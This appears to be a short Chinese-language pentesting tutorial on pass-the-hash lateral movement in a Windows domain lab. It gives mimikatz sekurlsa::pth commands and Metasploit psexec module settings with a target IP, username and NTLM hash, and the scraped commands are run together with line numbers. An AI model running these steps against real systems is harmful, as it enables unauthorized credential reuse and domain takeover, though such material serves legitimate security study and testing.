Hash传递相关知识点

当我们获得一台服务器的system权限后,成功获取了服务器的hash值,但无法捕获到明文密码或解密密码时,我们可以尝试使用pass the hash(hash传递)技术进行横向渗透攻击。

使用mimikatz进行PTH攻击

在这个实验中,我们使用的是Windows Server 2012 R2作为域控制器,未能捕获到明文密码,且无法解密设置的密码,注意这里的SID为500。

接下来,在攻击机器上(位于域控中的机器)运行mimikatz,并输入以下命令:

12 privilege::debugsekurlsa::pth /user:Administrator /domain:domainname /ntlm:519c985a849313d2c8029b293b57de1f 执行后会弹出一个新的CMD窗口。

这种方法可能显得有些鸡肋,因为它会弹出一个新的CMD窗口。你必须登录到域内的一台3389才能利用这种方式。如果无法登录域内的远程桌面,这种命令行方式就无法使用,就像在Windows 10中绕过UAC一样,不太喜欢这种弹出新窗口的方式。

使用Metasploit进行PTH攻击

1234 use exploit/windows/smb/psexecset rhosts 192.168.15.181set SMBUser rabbitmaskset SMBPass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4